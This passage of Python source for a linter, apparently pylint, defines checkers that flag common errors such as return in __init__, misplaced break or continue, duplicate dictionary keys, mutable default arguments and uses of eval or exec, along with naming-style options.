                nice_stats[node_type]['percent_badname'] = 'NC'
    # Build a flat 6-column table: header row first, then one row per type.
    lines = ('type', 'number', 'old number', 'difference',
             '%documented', '%badname')
    for node_type in ('module', 'class', 'method', 'function'):
        new = stats[node_type]
        old = old_stats.get(node_type, None)
        if old is not None:
            diff_str = reporters.diff_string(old, new)
        else:
            old, diff_str = 'NC', 'NC'
        lines += (node_type, str(new), str(old), diff_str,
                  nice_stats[node_type].get('percent_documented', '0'),
                  nice_stats[node_type].get('percent_badname', '0'))
    sect.append(reporter_nodes.Table(children=lines, cols=6, rheaders=1))


def redefined_by_decorator(node):
    """return True if the object is a method redefined via decorator.

    For example:
        @property
        def x(self): return self._x
        @x.setter
        def x(self, value): self._x = value
    """
    if node.decorators:
        for decorator in node.decorators.nodes:
            # e.g. `@x.setter` redefining `x`: the decorator's base
            # expression has the same name as the decorated function.
            if (isinstance(decorator, astroid.Attribute) and
                    getattr(decorator.expr, 'name', None) == node.name):
                return True
    return False


class _BasicChecker(checkers.BaseChecker):
    # Shared base for the checkers in this module: all register as
    # AST-based checkers under the 'basic' name.
    __implements__ = interfaces.IAstroidChecker
    name = 'basic'


class BasicErrorChecker(_BasicChecker):
    # msg-id -> (template, symbolic-name, description[, options])
    msgs = {
        'E0100': ('__init__ method is a generator',
                  'init-is-generator',
                  'Used when the special class method __init__ is turned into a '
                  'generator by a yield in its body.'),
        'E0101': ('Explicit return in __init__',
                  'return-in-init',
                  'Used when the special class method __init__ has an explicit '
                  'return value.'),
        'E0102': ('%s already defined line %s',
                  'function-redefined',
                  'Used when a function / class / method is redefined.'),
        'E0103': ('%r not properly in loop',
                  'not-in-loop',
                  'Used when break or continue keywords are used outside a loop.'),
        'E0104': ('Return outside function',
                  'return-outside-function',
                  'Used when a "return" statement is found outside a function or '
                  'method.'),
        'E0105': ('Yield outside function',
                  'yield-outside-function',
                  'Used when a "yield" statement is found outside a function or '
                  'method.'),
        'E0106': ('Return with argument inside generator',
                  'return-arg-in-generator',
                  'Used when a "return" statement with an argument is found '
                  'outside in a generator function or method (e.g. with some '
                  '"yield" statements).',
                  {'maxversion': (3, 3)}),
        'E0107': ("Use of the non-existent %s operator",
                  'nonexistent-operator',
                  "Used when you attempt to use the C-style pre-increment or "
                  "pre-decrement operator -- and ++, which doesn't exist in Python."),
        'E0108': ('Duplicate argument name %s in function definition',
                  'duplicate-argument-name',
                  'Duplicate argument names in function definitions are syntax'
                  ' errors.'),
        'E0110': ('Abstract class %r with abstract methods instantiated',
                  'abstract-class-instantiated',
                  'Used when an abstract class with `abc.ABCMeta` as metaclass '
                  'has abstract methods and is instantiated.'),
        'W0120': ('Else clause on loop without a break statement',
                  'useless-else-on-loop',
                  'Loops should only have an else clause if they can exit early '
                  'with a break statement, otherwise the statements under else '
                  'should be on the same scope as the loop itself.'),
        'E0112': ('More than one starred expression in assignment',
                  'too-many-star-expressions',
                  'Emitted when there are more than one starred '
                  'expressions (`*x`) in an assignment. This is a SyntaxError.'),
        'E0113': ('Starred assignment target must be in a list or tuple',
                  'invalid-star-assignment-target',
                  'Emitted when a star expression is used as a starred '
                  'assignment target.'),
        'E0114': ('Can use starred expression only in assignment target',
                  'star-needs-assignment-target',
                  'Emitted when a star expression is not used in an '
                  'assignment target.'),
        'E0115': ('Name %r is nonlocal and global',
                  'nonlocal-and-global',
                  'Emitted when a name is both nonlocal and global.'),
        'E0116': ("'continue' not supported inside 'finally' clause",
                  'continue-in-finally',
                  'Emitted when the `continue` keyword is found '
                  'inside a finally clause, which is a SyntaxError.'),
        'E0117': ("nonlocal name %s found without binding",
                  'nonlocal-without-binding',
                  'Emitted when a nonlocal variable does not have an attached '
                  'name somewhere in the parent scopes'),
        'E0118': ("Name %r is used prior to global declaration",
                  'used-prior-global-declaration',
                  'Emitted when a name is used prior a global declaration, '
                  'which results in an error since Python 3.6.',
                  {'minversion': (3, 6)}),
    }

    @utils.check_messages('function-redefined')
    def visit_classdef(self, node):
        self._check_redefinition('class', node)

    @utils.check_messages('too-many-star-expressions',
                          'invalid-star-assignment-target')
    def visit_assign(self, node):
        # More than one `*x` in the same target is a SyntaxError at runtime.
        starred = list(node.targets[0].nodes_of_class(astroid.Starred))
        if len(starred) > 1:
            self.add_message('too-many-star-expressions', node=node)

        # Check *a = b
        if isinstance(node.targets[0], astroid.Starred):
            self.add_message('invalid-star-assignment-target', node=node)

    @utils.check_messages('star-needs-assignment-target')
    def visit_starred(self, node):
        """Check that a Starred expression is used in an assignment target."""
        if isinstance(node.parent, astroid.Call):
            # f(*args) is converted to Call(args=[Starred]), so ignore
            # them for this check.
            return
        if PY35 and isinstance(node.parent,
                               (astroid.List, astroid.Tuple,
                                astroid.Set, astroid.Dict)):
            # PEP 448 unpacking.
            return

        stmt = node.statement()
        if not isinstance(stmt, astroid.Assign):
            return

        # A star expression on the value side of an assignment has no
        # assignment target -> error.
        if stmt.value is node or stmt.value.parent_of(node):
            self.add_message('star-needs-assignment-target', node=node)

    @utils.check_messages('init-is-generator', 'return-in-init',
                          'function-redefined', 'return-arg-in-generator',
                          'duplicate-argument-name', 'nonlocal-and-global',
                          'used-prior-global-declaration')
    def visit_functiondef(self, node):
        self._check_nonlocal_and_global(node)
        self._check_name_used_prior_global(node)
        if (not redefined_by_decorator(node) and
                not utils.is_registered_in_singledispatch_function(node)):
            self._check_redefinition(node.is_method() and 'method' or 'function', node)
        # checks for max returns, branch, return in __init__
        returns = node.nodes_of_class(astroid.Return,
                                      skip_klass=(astroid.FunctionDef,
                                                  astroid.ClassDef))
        if node.is_method() and node.name == '__init__':
            if node.is_generator():
                self.add_message('init-is-generator', node=node)
            else:
                values = [r.value for r in returns]
                # Are we returning anything but None from constructors
                if any(v for v in values if not utils.is_none(v)):
                    self.add_message('return-in-init', node=node)
        elif node.is_generator():
            # make sure we don't mix non-None returns and yields
            if not PY33:
                for retnode in returns:
                    if isinstance(retnode.value, astroid.Const) and \
                            retnode.value.value is not None:
                        self.add_message('return-arg-in-generator', node=node,
                                         line=retnode.fromlineno)
        # Check for duplicate names
        args = set()
        for name in node.argnames():
            if name in args:
                self.add_message('duplicate-argument-name', node=node, args=(name,))
            else:
                args.add(name)

    visit_asyncfunctiondef = visit_functiondef

    def _check_name_used_prior_global(self, node):
        # Map each name declared `global` directly in this scope to the
        # Global node that declares it.
        scope_globals = {
            name: child
            for child in node.nodes_of_class(astroid.Global)
            for name in child.names
            if child.scope() is node
        }

        for node_name in node.nodes_of_class(astroid.Name):
            if node_name.scope() is not node:
                continue

            name = node_name.name
            corresponding_global = scope_globals.get(name)
            if not corresponding_global:
                continue

            # Emit when the name is used on a line before its `global`
            # declaration (an error since Python 3.6).
            global_lineno = corresponding_global.fromlineno
            if global_lineno and global_lineno > node_name.fromlineno:
                self.add_message('used-prior-global-declaration',
                                 node=node_name, args=(name, ))

    def _check_nonlocal_and_global(self, node):
        """Check that a name is both nonlocal and global."""
        def same_scope(current):
            return current.scope() is node

        from_iter = itertools.chain.from_iterable
        nonlocals = set(from_iter(
            child.names for child in node.nodes_of_class(astroid.Nonlocal)
            if same_scope(child)))
        global_vars = set(from_iter(
            child.names for child in node.nodes_of_class(astroid.Global)
            if same_scope(child)))
        for name in nonlocals.intersection(global_vars):
            self.add_message('nonlocal-and-global',
                             args=(name, ), node=node)

    @utils.check_messages('return-outside-function')
    def visit_return(self, node):
        if not isinstance(node.frame(), astroid.FunctionDef):
            self.add_message('return-outside-function', node=node)

    @utils.check_messages('yield-outside-function')
    def visit_yield(self, node):
        self._check_yield_outside_func(node)

    @utils.check_messages('yield-outside-function')
    def visit_yieldfrom(self, node):
        self._check_yield_outside_func(node)

    @utils.check_messages('not-in-loop', 'continue-in-finally')
    def visit_continue(self, node):
        self._check_in_loop(node, 'continue')

    @utils.check_messages('not-in-loop')
    def visit_break(self, node):
        self._check_in_loop(node, 'break')

    @utils.check_messages('useless-else-on-loop')
    def visit_for(self, node):
        self._check_else_on_loop(node)

    @utils.check_messages('useless-else-on-loop')
    def visit_while(self, node):
        self._check_else_on_loop(node)

    @utils.check_messages('nonexistent-operator')
    def visit_unaryop(self, node):
        """check use of the non-existent ++ and -- operators"""
        # `++x` parses as UnaryOp('+', UnaryOp('+', x)); same for `--x`.
        if ((node.op in '+-') and
                isinstance(node.operand, astroid.UnaryOp) and
                (node.operand.op == node.op)):
            self.add_message('nonexistent-operator', node=node, args=node.op*2)

    def _check_nonlocal_without_binding(self, node, name):
        # Walk enclosing scopes outward looking for a binding of `name`.
        current_scope = node.scope()
        while True:
            if current_scope.parent is None:
                break

            if not isinstance(current_scope, (astroid.ClassDef, astroid.FunctionDef)):
                self.add_message('nonlocal-without-binding', args=(name, ),
                                 node=node)
                return
            if name not in current_scope.locals:
                current_scope = current_scope.parent.scope()
                continue

            # Okay, found it.
            return

        if not isinstance(current_scope, astroid.FunctionDef):
            self.add_message('nonlocal-without-binding', args=(name, ), node=node)

    @utils.check_messages('nonlocal-without-binding')
    def visit_nonlocal(self, node):
        for name in node.names:
            self._check_nonlocal_without_binding(node, name)

    @utils.check_messages('abstract-class-instantiated')
    def visit_call(self, node):
        """ Check instantiating abstract class with
        abc.ABCMeta as metaclass.
        """
        try:
            for inferred in node.func.infer():
                self._check_inferred_class_is_abstract(inferred, node)
        except astroid.InferenceError:
            return

    def _check_inferred_class_is_abstract(self, infered, node):
        if not isinstance(infered, astroid.ClassDef):
            return

        klass = utils.node_frame_class(node)
        if klass is infered:
            # Don't emit the warning if the class is instantiated
            # in its own body or if the call is not an instance
            # creation. If the class is instantiated into its own
            # body, we're expecting that it knows what it is doing.
            return # __init__ was called

        metaclass = infered.metaclass()
        abstract_methods = _has_abstract_methods(infered)
        if metaclass is None:
            # Python 3.4 has `abc.ABC`, which won't be detected
            # by ClassNode.metaclass()
            for ancestor in infered.ancestors():
                if ancestor.qname() == 'abc.ABC' and abstract_methods:
                    self.add_message('abstract-class-instantiated',
                                     args=(infered.name, ),
                                     node=node)
                    break

            return

        if metaclass.qname() == 'abc.ABCMeta' and abstract_methods:
            self.add_message('abstract-class-instantiated',
                             args=(infered.name, ),
                             node=node)

    def _check_yield_outside_func(self, node):
        # Lambdas can legally contain yield expressions, hence the tuple.
        if not isinstance(node.frame(), (astroid.FunctionDef, astroid.Lambda)):
            self.add_message('yield-outside-function', node=node)

    def _check_else_on_loop(self, node):
        """Check that any loop with an else clause has a break statement."""
        if node.orelse and not _loop_exits_early(node):
            self.add_message('useless-else-on-loop', node=node,
                             # This is not optimal, but the line previous
                             # to the first statement in the else clause
                             # will usually be the one that contains the else:.
                             line=node.orelse[0].lineno - 1)

    def _check_in_loop(self, node, node_name):
        """check that a node is inside a for or while loop"""
        _node = node.parent
        while _node:
            if isinstance(_node, (astroid.For, astroid.While)):
                # A break/continue in the loop's else clause is NOT
                # "in the loop".
                if node not in _node.orelse:
                    return

            if isinstance(_node, (astroid.ClassDef, astroid.FunctionDef)):
                break
            if (isinstance(_node, astroid.TryFinally)
                    and node in _node.finalbody
                    and isinstance(node, astroid.Continue)):
                self.add_message('continue-in-finally', node=node)

            _node = _node.parent

        self.add_message('not-in-loop', node=node, args=node_name)

    def _check_redefinition(self, redeftype, node):
        """check for redefinition of a function / method / class name"""
        defined_self = node.parent.frame()[node.name]
        if defined_self is not node and not astroid.are_exclusive(node, defined_self):
            # Names matching the dummy-variables regex are allowed to be
            # redefined silently.
            dummy_variables_rgx = lint_utils.get_global_option(
                self, 'dummy-variables-rgx', default=None)
            if dummy_variables_rgx and dummy_variables_rgx.match(node.name):
                return
            self.add_message('function-redefined', node=node,
                             args=(redeftype, defined_self.fromlineno))


class BasicChecker(_BasicChecker):
    """checks for :
    * doc strings
    * number of arguments, local variables, branches, returns and statements in
    functions, methods
    * required module attributes
    * dangerous default values as arguments
    * redefinition of function / method / class
    * uses of the global statement
    """

    __implements__ = interfaces.IAstroidChecker

    name = 'basic'
    # msg-id -> (template, symbolic-name, description)
    msgs = {
        'W0101': ('Unreachable code',
                  'unreachable',
                  'Used when there is some code behind a "return" or "raise" '
                  'statement, which will never be accessed.'),
        'W0102': ('Dangerous default value %s as argument',
                  'dangerous-default-value',
                  'Used when a mutable value as list or dictionary is detected in '
                  'a default value for an argument.'),
        'W0104': ('Statement seems to have no effect',
                  'pointless-statement',
                  'Used when a statement doesn\'t have (or at least seems to) '
                  'any effect.'),
        'W0105': ('String statement has no effect',
                  'pointless-string-statement',
                  'Used when a string is used as a statement (which of course '
                  'has no effect). This is a particular case of W0104 with its '
                  'own message so you can easily disable it if you\'re using '
                  'those strings as documentation, instead of comments.'),
        'W0106': ('Expression "%s" is assigned to nothing',
                  'expression-not-assigned',
                  'Used when an expression that is not a function call is assigned '
                  'to nothing. Probably something else was intended.'),
        'W0108': ('Lambda may not be necessary',
                  'unnecessary-lambda',
                  'Used when the body of a lambda expression is a function call '
                  'on the same argument list as the lambda itself; such lambda '
                  'expressions are in all but a few cases replaceable with the '
                  'function being called in the body of the lambda.'),
        'W0109': ("Duplicate key %r in dictionary",
                  'duplicate-key',
                  'Used when a dictionary expression binds the same key multiple '
                  'times.'),
        'W0122': ('Use of exec',
                  'exec-used',
                  'Used when you use the "exec" statement (function for Python '
                  '3), to discourage its usage. That doesn\'t '
                  'mean you cannot use it !'),
        'W0123': ('Use of eval',
                  'eval-used',
                  'Used when you use the "eval" function, to discourage its '
                  'usage. Consider using `ast.literal_eval` for safely evaluating '
                  'strings containing Python expressions '
                  'from untrusted sources. '),
        'W0150': ("%s statement in finally block may swallow exception",
                  'lost-exception',
                  'Used when a break or a return statement is found inside the '
                  'finally clause of a try...finally block: the exceptions raised '
                  'in the try clause will be silently swallowed instead of being '
                  're-raised.'),
        'W0199': ('Assert called on a 2-uple. Did you mean \'assert x,y\'?',
                  'assert-on-tuple',
                  'A call of assert on a tuple will always evaluate to true if '
                  'the tuple is not empty, and will always evaluate to false if '
                  'it is.'),
        'W0124': ('Following "as" with another context manager looks like a tuple.',
                  'confusing-with-statement',
                  'Emitted when a `with` statement component returns multiple values '
                  'and uses name binding with `as` only for a part of those values, '
                  'as in with ctx() as a, b. This can be misleading, since it\'s not '
                  'clear if the context manager returns a tuple or if the node without '
                  'a name binding is another context manager.'),
        'W0125': ('Using a conditional statement with a constant value',
                  'using-constant-test',
                  'Emitted when a conditional statement (If or ternary if) '
                  'uses a constant value for its test. This might not be what '
                  'the user intended to do.'),
        'E0111': ('The first reversed() argument is not a sequence',
                  'bad-reversed-sequence',
                  'Used when the first argument to reversed() builtin '
                  'isn\'t a sequence (does not implement __reversed__, '
                  'nor __getitem__ and __len__'),
    }

    reports = (('RP0101', 'Statistics by type', report_by_type_stats),)

    def __init__(self, linter):
        _BasicChecker.__init__(self, linter)
        self.stats = None
        # Stack of TryFinally nodes currently being visited.
        self._tryfinallys = None

    def open(self):
        """initialize visit variables and statistics
        """
        self._tryfinallys = []
        self.stats = self.linter.add_stats(module=0, function=0,
                                           method=0, class_=0)

    @utils.check_messages('using-constant-test')
    def visit_if(self, node):
        self._check_using_constant_test(node, node.test)

    @utils.check_messages('using-constant-test')
    def visit_ifexp(self, node):
        self._check_using_constant_test(node, node.test)

    @utils.check_messages('using-constant-test')
    def visit_comprehension(self, node):
        if node.ifs:
            for if_test in node.ifs:
                self._check_using_constant_test(node, if_test)

    def _check_using_constant_test(self, node, test):
        # Node types that always evaluate truthy/constant in a test.
        const_nodes = (
            astroid.Module,
            astroid.scoped_nodes.GeneratorExp,
            astroid.Lambda, astroid.FunctionDef, astroid.ClassDef,
            astroid.bases.Generator, astroid.UnboundMethod,
            astroid.BoundMethod, astroid.Module)
        structs = (astroid.Dict, astroid.Tuple, astroid.Set)

        # These nodes are excepted, since they are not constant
        # values, requiring a computation to happen. The only type
        # of node in this list which doesn't have this property is
        # Attribute, which is excepted because the conditional statement
        # can be used to verify that the attribute was set inside a class,
        # which is definitely a valid use case.
        except_nodes = (astroid.Attribute, astroid.Call,
                        astroid.BinOp, astroid.BoolOp, astroid.UnaryOp,
                        astroid.Subscript)
        inferred = None
        emit = isinstance(test, (astroid.Const, ) + structs + const_nodes)
        if not isinstance(test, except_nodes):
            inferred = utils.safe_infer(test)

        if emit or isinstance(inferred, const_nodes):
            self.add_message('using-constant-test', node=node)

    def visit_module(self, _):
        """check module name, docstring and required arguments
        """
        self.stats['module'] += 1

    def visit_classdef(self, node): # pylint: disable=unused-argument
        """check module name, docstring and redefinition
        increment branch counter
        """
        self.stats['class'] += 1

    @utils.check_messages('pointless-statement', 'pointless-string-statement',
                          'expression-not-assigned')
    def visit_expr(self, node):
        """check for various kind of statements without effect"""
        expr = node.value
        if isinstance(expr, astroid.Const) and isinstance(expr.value, str):
            # treat string statement in a separated message
            # Handle PEP-257 attribute docstrings.
            # An attribute docstring is defined as being a string right after
            # an assignment at the module level, class level or __init__ level.
            scope = expr.scope()
            if isinstance(scope, (astroid.ClassDef, astroid.Module, astroid.FunctionDef)):
                if isinstance(scope, astroid.FunctionDef) and scope.name != '__init__':
                    pass
                else:
                    # A string immediately following an assignment in the same
                    # scope is a PEP-257 attribute docstring -> no message.
                    sibling = expr.previous_sibling()
                    if (sibling is not None and sibling.scope() is scope and
                            isinstance(sibling, astroid.Assign)):
                        return
            self.add_message('pointless-string-statement', node=node)
            return

        # ignore if this is :
        # * a direct function call
        # * the unique child of a try/except body
        # * a yield (which are wrapped by a discard node in _ast XXX)
        # warn W0106 if we have any underlying function call (we can't predict
        # side effects), else pointless-statement
        if (isinstance(expr, (astroid.Yield, astroid.Await, astroid.Call)) or
                (isinstance(node.parent, astroid.TryExcept) and
                 node.parent.body == [node])):
            return
        if any(expr.nodes_of_class(astroid.Call)):
            self.add_message('expression-not-assigned', node=node,
                             args=expr.as_string())
        else:
            self.add_message('pointless-statement', node=node)

    @staticmethod
    def _filter_vararg(node, call_args):
        # Return the arguments for the given call which are
        # not passed as vararg.
        for arg in call_args:
            if isinstance(arg, astroid.Starred):
                if (isinstance(arg.value, astroid.Name)
                        and arg.value.name != node.args.vararg):
                    yield arg
            else:
                yield arg

    @staticmethod
    def _has_variadic_argument(args, variadic_name):
        # True unless every forwarded arg is exactly the name
        # `variadic_name` (also True when there are no args at all).
        if not args:
            return True
        for arg in args:
            if isinstance(arg.value, astroid.Name):
                if arg.value.name != variadic_name:
                    return True
            else:
                return True
        return False

    @utils.check_messages('unnecessary-lambda')
    def visit_lambda(self, node):
        """check whether or not the lambda is suspicious
        """
        # if the body of the lambda is a call expression with the same
        # argument list as the lambda itself, then the lambda is
        # possibly unnecessary and at least suspicious.
        if node.args.defaults:
            # If the arguments of the lambda include defaults, then a
            # judgment cannot be made because there is no way to check
            # that the defaults defined by the lambda are the same as
            # the defaults defined by the function called in the body
            # of the lambda.
            return
        call = node.body
        if not isinstance(call, astroid.Call):
            # The body of the lambda must be a function call expression
            # for the lambda to be unnecessary.
            return
        if (isinstance(node.body.func, astroid.Attribute) and
                isinstance(node.body.func.expr, astroid.Call)):
            # Chained call, the intermediate call might
            # return something else (but we don't check that, yet).
            return

        ordinary_args = list(node.args.args)
        new_call_args = list(self._filter_vararg(node, call.args))
        if node.args.kwarg:
            if self._has_variadic_argument(call.kwargs, node.args.kwarg):
                return
        elif call.kwargs or call.keywords:
            return

        if node.args.vararg:
            if self._has_variadic_argument(call.starargs, node.args.vararg):
                return
        elif call.starargs:
            return

        # The "ordinary" arguments must be in a correspondence such that:
        # ordinary_args[i].name == call.args[i].name.
        if len(ordinary_args) != len(new_call_args):
            return
        for arg, passed_arg in zip(ordinary_args, new_call_args):
            if not isinstance(passed_arg, astroid.Name):
                return
            if arg.name != passed_arg.name:
                return

        self.add_message('unnecessary-lambda', line=node.fromlineno, node=node)

    @utils.check_messages('dangerous-default-value')
    def visit_functiondef(self, node):
        """check function name, docstring, arguments, redefinition,
        variable names, max locals
        """
        self.stats[node.is_method() and 'method' or 'function'] += 1
        self._check_dangerous_default(node)

    visit_asyncfunctiondef = visit_functiondef

    def _check_dangerous_default(self, node):
        # check for dangerous default values as arguments
        is_iterable = lambda n: isinstance(n, (astroid.List,
                                               astroid.Set,
                                               astroid.Dict))
        for default in node.args.defaults:
            try:
                value = next(default.infer())
            except astroid.InferenceError:
                continue

            if (isinstance(value, astroid.Instance) and
                    value.qname() in DEFAULT_ARGUMENT_SYMBOLS):

                if value is default:
                    msg = DEFAULT_ARGUMENT_SYMBOLS[value.qname()]
                elif isinstance(value, astroid.Instance) or is_iterable(value):
                    # We are here in the following situation(s):
                    #   * a dict/set/list/tuple call which wasn't inferred
                    #     to a syntax node ({}, () etc.). This can happen
                    #     when the arguments are invalid or unknown to
                    #     the inference.
                    #   * a variable from somewhere else, which turns out to be a list
                    #     or a dict.
                    if is_iterable(default):
                        msg = value.pytype()
                    elif isinstance(default, astroid.Call):
                        msg = '%s() (%s)' % (value.name, value.qname())
                    else:
                        msg = '%s (%s)' % (default.as_string(), value.qname())
                else:
                    # this argument is a name
                    msg = '%s (%s)' % (default.as_string(),
                                       DEFAULT_ARGUMENT_SYMBOLS[value.qname()])
                self.add_message('dangerous-default-value',
                                 node=node,
                                 args=(msg, ))

    @utils.check_messages('unreachable', 'lost-exception')
    def visit_return(self, node):
        """1 - check is the node has a right sibling (if so, that's some
        unreachable code)
        2 - check is the node is inside the finally clause of a try...finally
        block
        """
        self._check_unreachable(node)
        # Is it inside final body of a try...finally bloc ?
        self._check_not_in_finally(node, 'return', (astroid.FunctionDef,))

    @utils.check_messages('unreachable')
    def visit_continue(self, node):
        """check is the node has a right sibling (if so, that's some
        unreachable code)
        """
        self._check_unreachable(node)

    @utils.check_messages('unreachable', 'lost-exception')
    def visit_break(self, node):
        """1 - check is the node has a right sibling (if so, that's some
        unreachable code)
        2 - check is the node is inside the finally clause of a try...finally
        block
        """
        # 1 - Is it right sibling ?
        self._check_unreachable(node)
        # 2 - Is it inside final body of a try...finally bloc ?
        self._check_not_in_finally(node, 'break', (astroid.For, astroid.While,))

    @utils.check_messages('unreachable')
    def visit_raise(self, node):
        """check if the node has a right sibling (if so, that's some
        unreachable code)
        """
        self._check_unreachable(node)

    @utils.check_messages('exec-used')
    def visit_exec(self, node):
        """just print a warning on exec statements"""
        self.add_message('exec-used', node=node)

    @utils.check_messages('eval-used', 'exec-used', 'bad-reversed-sequence')
    def visit_call(self, node):
        """visit a Call node -> check if this is not a blacklisted builtin
        call and check for * or ** use
        """
        if isinstance(node.func, astroid.Name):
            name = node.func.name
            # ignore the name if it's not a builtin (i.e. not defined in the
            # locals nor globals scope)
            if not (name in node.frame() or
                    name in node.root()):
                if name == 'exec':
                    self.add_message('exec-used', node=node)
                elif name == 'reversed':
                    self._check_reversed(node)
                elif name == 'eval':
                    self.add_message('eval-used', node=node)

    @utils.check_messages('assert-on-tuple')
    def visit_assert(self, node):
        """check the use of an assert statement on a tuple."""
        if node.fail is None and isinstance(node.test, astroid.Tuple) and \
                len(node.test.elts) == 2:
            self.add_message('assert-on-tuple', node=node)

    @utils.check_messages('duplicate-key')
    def visit_dict(self, node):
        """check duplicate key in dictionary"""
        keys = set()
        for k, _ in node.items:
            if isinstance(k, astroid.Const):
                key = k.value
                if key in keys:
                    self.add_message('duplicate-key', node=node, args=key)
                keys.add(key)

    def visit_tryfinally(self, node):
        """update try...finally flag"""
        self._tryfinallys.append(node)

    def leave_tryfinally(self, node): # pylint: disable=unused-argument
        """update try...finally flag"""
        self._tryfinallys.pop()

    def _check_unreachable(self, node):
        """check unreachable code"""
        unreach_stmt = node.next_sibling()
        if unreach_stmt is not None:
            self.add_message('unreachable', node=unreach_stmt)

    def _check_not_in_finally(self, node, node_name, breaker_classes=()):
        """check that a node is not inside a finally clause of a
        try...finally statement.
        If we found before a try...finally bloc a parent which its type is
        in breaker_classes, we skip the whole check."""
        # if self._tryfinallys is empty, we're not an in try...finally block
        if not self._tryfinallys:
            return
        # the node could be a grand-grand...-children of the try...finally
        _parent = node.parent
        _node = node
        while _parent and not isinstance(_parent, breaker_classes):
            if hasattr(_parent, 'finalbody') and _node in _parent.finalbody:
                self.add_message('lost-exception', node=node, args=node_name)
                return
            _node = _parent
            _parent = _node.parent

    def _check_reversed(self, node):
        """ check that the argument to `reversed` is a sequence """
        try:
            argument = utils.safe_infer(utils.get_argument_from_call(node, position=0))
        except utils.NoSuchArgumentError:
            pass
        else:
            if argument is astroid.YES:
                return
            if argument is None:
                # Nothing was infered.
                # Try to see if we have iter().
                if isinstance(node.args[0], astroid.Call):
                    try:
                        func = next(node.args[0].func.infer())
                    except astroid.InferenceError:
                        return
                    if (getattr(func, 'name', None) == 'iter' and
                            utils.is_builtin_object(func)):
                        self.add_message('bad-reversed-sequence', node=node)
                return

            if isinstance(argument, astroid.Instance):
                if (argument._proxied.name == 'dict' and
                        utils.is_builtin_object(argument._proxied)):
                    self.add_message('bad-reversed-sequence', node=node)
                    return
                if any(ancestor.name == 'dict' and utils.is_builtin_object(ancestor)
                       for ancestor in argument._proxied.ancestors()):
                    # Mappings aren't accepted by reversed(), unless
                    # they provide explicitly a __reversed__ method.
                    try:
                        argument.locals[REVERSED_PROTOCOL_METHOD]
                    except KeyError:
                        self.add_message('bad-reversed-sequence', node=node)
                    return

                # Accept the instance if it implements at least one full
                # method group from REVERSED_METHODS; otherwise warn.
                for methods in REVERSED_METHODS:
                    for meth in methods:
                        try:
                            argument.getattr(meth)
                        except astroid.NotFoundError:
                            break
                    else:
                        break
                else:
                    self.add_message('bad-reversed-sequence', node=node)
            elif not isinstance(argument, (astroid.List, astroid.Tuple)):
                # everything else is not a proper sequence for reversed()
                self.add_message('bad-reversed-sequence', node=node)

    @utils.check_messages('confusing-with-statement')
    def visit_with(self, node):
        if not PY3K:
            # in Python 2 a "with" statement with multiple managers coresponds
            # to multiple nested AST "With" nodes
            pairs = []
            parent_node = node.parent
            if isinstance(parent_node, astroid.With):
                # we only care about the direct parent, since this method
                # gets called for each with node anyway
                pairs.extend(parent_node.items)
            pairs.extend(node.items)
        else:
            # in PY3K a "with" statement with multiple managers coresponds
            # to one AST "With" node with multiple items
            pairs = node.items
        if pairs:
            for prev_pair, pair in zip(pairs, pairs[1:]):
                if (isinstance(prev_pair[1], astroid.AssignName) and
                        (pair[1] is None and not isinstance(pair[0], astroid.Call))):
                    # don't emit a message if the second is a function call
                    # there's no way that can be mistaken for a name assignment
                    if PY3K or node.lineno == node.parent.lineno:
                        # if the line number doesn't match
                        # we assume it's a nested "with"
                        self.add_message('confusing-with-statement', node=node)


# Name categories checked by NameChecker.
KNOWN_NAME_TYPES = {
    "module", "const", "class", "function", "method", "attr",
    "argument", "variable", "class_attribute", "inlinevar"
}


# Category key -> human readable label used in option help texts.
HUMAN_READABLE_TYPES = {
    'module': 'module',
    'const': 'constant',
    'class': 'class',
    'function': 'function',
    'method': 'method',
    'attr': 'attribute',
    'argument': 'argument',
    'variable': 'variable',
    'class_attribute': 'class attribute',
    'inlinevar': 'inline iteration',
}

# Default naming style per category (overridable via options).
DEFAULT_NAMING_STYLES = {
    "module": "snake_case",
    "const": "UPPER_CASE",
    "class": "PascalCase",
    "function": "snake_case",
    "method": "snake_case",
    "attr": "snake_case",
    "argument": "snake_case",
    "variable": "snake_case",
    "class_attribute": "any",
    "inlinevar": "any",
}


def _create_naming_options():
    # Build two options per name category: <type>-naming-style and
    # <type>-rgx (the regex, when set, overrides the style).
    name_options = []
    for name_type in sorted(KNOWN_NAME_TYPES):
        human_readable_name = HUMAN_READABLE_TYPES[name_type]
        default_style = DEFAULT_NAMING_STYLES[name_type]
        name_type = name_type.replace('_', '-')
        name_options.append((
            '%s-naming-style' % (name_type,),
            {'default': default_style,
             'type': 'choice', 'choices': list(NAMING_STYLES.keys()), 'metavar': '<style>',
             'help': 'Naming style matching correct %s names' % (human_readable_name,)}),)
        name_options.append((
            '%s-rgx' % (name_type,),
            {'default': None, 'type': 'regexp', 'metavar': '<regexp>',
             'help': 'Regular expression matching correct %s names. Overrides %s-naming-style'
                     % (human_readable_name, name_type,)}))
    return tuple(name_options)


class NameChecker(_BasicChecker):
    msgs = {
        'C0102': ('Black listed name "%s"',
                  'blacklisted-name',
                  'Used when the name is listed in the black list (unauthorized '
                  'names).'),
        'C0103': ('%s name "%s" doesn\'t conform to %s',
                  'invalid-name',
                  'Used when the name doesn\'t conform to naming rules '
                  'associated to its type (constant, variable, class...).'),
        'W0111': ('Name %s will become a keyword in Python %s',
                  'assign-to-new-keyword',
                  'Used when assignment will become invalid in future '
                  'Python release due to introducing new keyword'),
    }

    options = (('good-names',
                {'default' : ('i', 'j', 'k', 'ex', 'Run', '_'),
                 'type' :'csv', 'metavar' : '<names>',
                 'help' : 'Good variable names which should always be accepted,'
                          ' separated by a comma'}
               ),
               ('bad-names',
                {'default' : ('foo', 'bar', 'baz', 'toto', 'tutu', 'tata'),
                 'type' :'csv', 'metavar' : '<names>',
                 'help' : 'Bad variable names which should always be refused, '
                          'separated by a comma'}
               ),
               ('name-group',
                {'default' : (),
                 'type' :'csv', 'metavar' : '<name1:name2>',
                 'help' : ('Colon-delimited sets of names that determine each'
                           ' other\'s naming style when the name regexes'
                           ' allow several styles.')}
               ),
               ('include-naming-hint',
                {'default': False, 'type': 'yn', 'metavar': '<y_or_n>',
                 'help': 'Include a hint for the correct naming format with invalid-name'}
               ),
               ('property-classes',
                {'default': ('abc.abstractproperty',),
                 'type': 'csv',
                 'metavar': '<decorator names>',
                 'help': 'List of decorators that produce properties, such as '
                         'abc.abstractproperty. Add to this list to register '
                         'other decorators that produce valid properties.'}
               ),
              ) + _create_naming_options()

    # Python version -> identifiers that become keywords in that version.
    KEYWORD_ONSET = {
        (3, 7): {'async', 'await'}
    }

    def __init__(self, linter):
        _BasicChecker.__init__(self, linter)
